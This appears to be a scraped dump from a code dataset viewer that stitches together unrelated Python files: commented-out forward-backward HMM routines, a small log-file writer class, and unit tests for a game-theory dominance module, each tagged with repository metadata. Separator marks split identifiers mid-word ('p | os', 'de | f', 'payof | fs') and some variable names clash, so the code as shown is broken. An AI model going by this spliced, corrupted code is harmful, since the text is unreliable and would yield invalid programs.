# trans_v = transition_scores[pos-1, current_state, prev_state]
# prob = forward_v*trans_v
# forward[pos, current_state] += prob
# forward[pos, current_state] *= emission_scores[pos, current_state]
# # forward[length-1,:] *= final_scores
# print 'Likelihood =', sum(forward[length-1,:] * final_scores)
#
# # Backward loop.
# # backward[length-1,:] = final_scores
# backward[length-1,:] = final_scores #1.0
# for pos in xrange(length-2,-1,-1):
# for current_state in xrange(num_states):
# prob = 0.0
# for next_state in xrange(num_states):
# back = backward[pos+1, next_state]
# trans = transition_scores[pos, next_state, current_state];
# observation = emission_scores[pos+1, next_state];
# prob += trans * observation * back;
# backward[pos, current_state] = prob
# # backward[0,:] *= initial_scores
# # sanity_check_forward_backward(forward,backward)
# print 'Likelihood =', sum(backward[0,:] * initial_scores * emission_scores[0,:])
return forward, backward
# ----------
# Computes the forward backward trellis for a given sequence and node and edge potentials
# N - Length of sequence
# H - Number of hidden states
# Receives:
# Node potentials (N,H) vector
# Edge potentials (N-1,H,H)
# ----------
# def forward_backward(node_potentials,edge_potentials):
# H,N = node_potentials.shape
# forward = np.zeros([H,N],dtype=float)
# backward = np.zeros([H,N],dtype=float)
# forward[:,0] = node_potentials[:,0]
# # Forward loop
# for pos in xrange(1,N):
# for current_state in xrange(H):
# for prev_state in xrange(H):
# forward_v = forward[prev_state,pos-1]
# trans_v = edge_potentials[prev_state,current_state,pos-1]
# prob = forward_v*trans_v
# forward[current_state,pos] += prob
# forward[current_state,pos] *= node_potentials[current_state,pos]
# # Backward loop
# backward[:,N-1] = 1
# for pos in xrange(N-2,-1,-1):
# for current_state in xrange(H):
# prob = 0
# for next_state in xrange(H):
# back = backward[next_state,pos+1]
# trans = edge_potentials[current_state,next_state,pos];
# observation = node_potentials[next_state,pos+1];
# prob += trans * observation * back;
# backward[current_state,pos] = prob
# # sanity_check_forward_backward(forward,backward)
# return forward,backward
# def forward_backward_trans_probs(node_potentials,transitions_probs):
# H,N = node_potentials.shape
# forward = np.zeros([H,N],dtype=float)
# backward = np.zeros([H,N],dtype=float)
# forward[:,0] = node_potentials[:,0]
# # Forward loop
# for pos in xrange(1,N):
# for current_state in xrange(H):
# for prev_state in xrange(H):
# forward_v = forward[prev_state,pos-1]
# trans_v = transitions_probs[current_state,prev_state]
# prob = forward_v*trans_v
# forward[current_state,p | os] += prob
# forward[current_state,pos] *= node_potentials[current_state,pos]
# # Backward loop
# backward[:,N-1] = 1
# for pos in xrange(N-2,-1,-1):
# for current_state in xrange(H):
# prob = 0
# for next_state in xrange(H):
# | back = backward[next_state,pos+1]
# trans = transition_probs[next_state,current_state];
# observation = node_potentials[next_state,pos+1];
# prob += trans * observation * back;
# backward[current_state,pos] = prob
# # sanity_check_forward_backward(forward,backward)
# return forward,backward
# ----------
# For every position - pos the sum_states forward(pos,state)*backward(pos,state) = Likelihood
# ----------
def sanity_check_forward_backward(forward, backward):
N, H = forward.shape
likelihood = np.zeros([N, 1])
for pos in xrange(N):
aux = 0
for current_state in xrange(H):
aux += forward[pos, current_state] * backward[pos, current_state]
likelihood[pos] = aux
for i in xrange(pos):
if abs(aux - likelihood[i]) > 0.001:
print "Likelihood for pos %i and pos %i mismatch: %f - |
abhishek8gupta/sp17-i524 | project/S17-IO-3017/code/projectearth/testfile.py | Python | apache-2.0 | 616 | 0.008117 | import os
class classFileWrite:
fileobj = None
directory = "./benchmark"
fpath = directory + "/test.txt"
de | f __init__(self):
if not os.path.exists(self.directory):
os.makedirs(self.directory)
self.openfile()
def openfile(self):
self.fileobj = open(self.fpath, "a")
def writeline(self):
line = "=" * 60
line=line+"\n"
self.fileobj.write(line)
| def writelog(self,logstr=""):
self.fileobj.seek(0,0)
logstr = logstr+"\n"
self.fileobj.write(logstr)
def closefile(self):
self.fileobj.close()
|
yackj/GameAnalysis | test/dominance_test.py | Python | apache-2.0 | 5,333 | 0 | import json
import numpy as np
from gameanalysis import dominance
from gameanalysis import gamegen
from gameanalysis import gameio
from gameanalysis import rsgame
def test_weakly_dominated():
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[2, 0],
[2, 1],
[0, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.weakly_dominated(game)
assert np.all(wd == [False, True])
profiles = [
[2, 0],
[0, 2]
]
payoffs = [
[2, 0],
[0, 2],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.weakly_dominated(game)
assert np.all(wd == [False, False])
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[2, 0],
[2, 1],
[0, 2],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.weakly_dominated(game)
assert np.all(wd == [False, True])
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[2, 0],
[2, 2],
[0, 2],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.weakly_dominated(game)
assert np.all(wd == [True, True])
def test_weakly_dominated_conditional():
profiles = [
[0, 2],
[1, 1],
]
payoffs = [
[0, 1],
[1, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.weakly_dominated(game)
assert np.all(wd == [True, False])
wd = dominance.weakly_dominated(game, False)
assert np.all(wd == [True, True])
def test_strictly_dominated():
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[2, 0],
[2, 1],
[0, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.strictly_dominated(game)
assert np.all(wd == [False, True])
profiles = [
[2, 0],
[0, 2]
]
payoffs = [
[2, 0],
[0, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.strictly_dominated(game)
assert np.all(wd == [False, False])
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[2, 0],
[2, 2],
[0, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.strictly_dominated(game)
assert np.all(wd == [False, False])
def test_strictly_dominated_conditional():
profiles = [
[0, 2],
[1, 1],
]
payoffs = [
[0, 1],
[2, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.strictly_dominated(game)
assert np.all(wd == [False, False])
wd = dominance.strictly_dominated(game, False)
assert np.all(wd == [False, True])
profiles = [
[2, 0],
[1, 1],
]
payoffs = [
[2, 0],
[2, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.strictly_dominated(game)
assert np.all(wd == [False, True])
profiles = [
[2, 0],
[1, 1],
]
payoffs = [
[2, 0],
[2, 2],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.strictly_dominated(game)
assert np.all(wd == [False, False])
profiles = [
[2, 0],
[0, 2]
]
payoffs = [
[2, 0],
[0, 1],
]
game = rsgame.game(2, 2, profiles, payof | fs)
wd = dominance.strictly_dominated(game, F | alse)
assert np.all(wd == [False, False])
def test_never_best_response():
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[1, 0],
[2, 2],
[0, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.never_best_response(game, False)
assert np.all(wd == [False, False])
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[2, 0],
[2, 2],
[0, 2],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.never_best_response(game, False)
assert np.all(wd == [False, False])
profiles = [
[2, 0],
[1, 1],
[0, 2],
]
payoffs = [
[1, 0],
[2, 2],
[0, 3],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.never_best_response(game, False)
assert np.all(wd == [True, False])
def test_never_best_response_conditional():
profiles = [
[2, 0],
[0, 2],
]
payoffs = [
[1, 0],
[0, 1],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.never_best_response(game, True)
assert np.all(wd == [False, False])
profiles = [
[1, 1],
[0, 2],
]
payoffs = [
[2, 2],
[0, 3],
]
game = rsgame.game(2, 2, profiles, payoffs)
wd = dominance.never_best_response(game, True)
assert np.all(wd == [True, False])
def test_travellers_dilemma():
game = gamegen.travellers_dilemma(max_value=6)
mask = dominance.iterated_elimination(game, 'weakdom')
assert np.all(mask == [True] + [False] * 4)
def test_known_fail_case():
with open('test/hard_nash_game_1.json') as f:
game, _ = gameio.read_game(json.load(f))
dominance.iterated_elimination(game, 'neverbr')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.